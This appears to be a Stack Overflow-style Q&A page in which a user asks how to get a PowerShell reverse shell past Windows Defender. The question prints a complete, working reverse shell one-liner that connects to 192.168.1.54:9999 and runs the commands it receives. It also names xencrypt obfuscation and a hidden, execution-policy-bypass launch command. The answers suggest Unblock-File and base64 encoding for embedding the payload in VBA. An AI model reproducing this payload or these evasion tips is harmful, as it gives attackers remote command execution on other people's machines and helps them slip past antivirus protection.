powershell reverse shell AV evasion

Question

I'm trying to run a powershell reverse shell on windows 10. Anyway everytime it is blocked by Wndows Defender. How can I bypass it?

In a file I store the payload $client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

then I use xencrypt (https://github.com/the-xentropy/xencrypt) to obfuscate the code but when I run powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1

I get Questo script include contenuto dannoso ed è stato bloccato dal software antivirus. In riga:18 car:1 + IEX($piifnga) + ~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

QUESTION: is there a way to bypass this check?

This question is really not a very good fit for StackOverflow. In any case, the answer is "probably", good luck finding one :) — Mathias R. Jessen, May 11 '20 at 17:38

score 0 · Answer 1 · answered Feb 22 '21 at 15:40

0

Have you tried Unblock-File .\revshell.ps1 before trying to run the reverse shell script (understanding the risks associated with running untrusted code downloaded onto the machine)?

answered Feb 22 '21 at 15:40

WaitingForGuacamole

3,744
1
8
22

Welcome to Stack Overflow! I recommend against rhetoric questions in answers. They risk being misunderstood as not an answer at all. You are trying to answer the question at the top of this page, aren't you? Otherwise please delete this post. – Yunnosch Feb 22 '21 at 22:53
It's not rhetoric - I suggested `Unblock-File` as the solution to the question, pointing out that there needs to be an awareness that there is risk. I do believe that it could be the correct technical solution to the problem, however, if I do not point out that there is some security risk, where I believe that to be true, I'm being irresponsible. – WaitingForGuacamole Feb 22 '21 at 23:46
If it is not a rhetoric question then it is not an answer. Please delete this non-answer andf ask your question on this question as a comment (you do have the commentgin privilege). – Yunnosch Feb 23 '21 at 06:39

score -1 · Answer 2 · answered Feb 22 '21 at 12:25

-1

Just encoded it or you can change it to base64 to embed it to vba

answered Feb 22 '21 at 12:25

Ấn Nguyễn Hoàng Quốc

1

1

An example would be much more helpful. – WaitingForGuacamole Feb 22 '21 at 15:37

powershell reverse shell AV evasion

2 Answers2